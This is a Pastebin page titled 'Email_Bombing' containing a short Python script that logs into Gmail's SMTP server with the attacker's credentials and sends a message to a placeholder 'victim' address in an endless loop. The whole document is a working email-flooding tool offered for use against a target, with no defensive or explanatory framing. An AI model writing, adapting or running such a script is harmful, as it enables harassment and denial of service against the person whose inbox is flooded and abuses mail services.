Guest User

Email_Bombing

a guest
Feb 12th, 2016
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.44 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import smtplib
  4.  
  5. my_email = "paste your Email "
  6. victim_email = "Paste Victim Email"
  7.  
  8. message = "Testing"
  9.  
  10. username = "Your Gmail Id"
  11. password = "Your Gmail Password"
  12.  
  13. try:
  14.     while True:
  15.         server = smtplib.SMTP("smtp.gmail.com:587")
  16.         server.starttls()
  17.         server.login(username,password)
  18.         server.sendmail(my_email,victim_email,message)
  19.         server.quit()
  20.         print "Mail Send Successfully !"
  21. except:
  22.     print "Some Error !"
Add Comment
Please, Sign In to add comment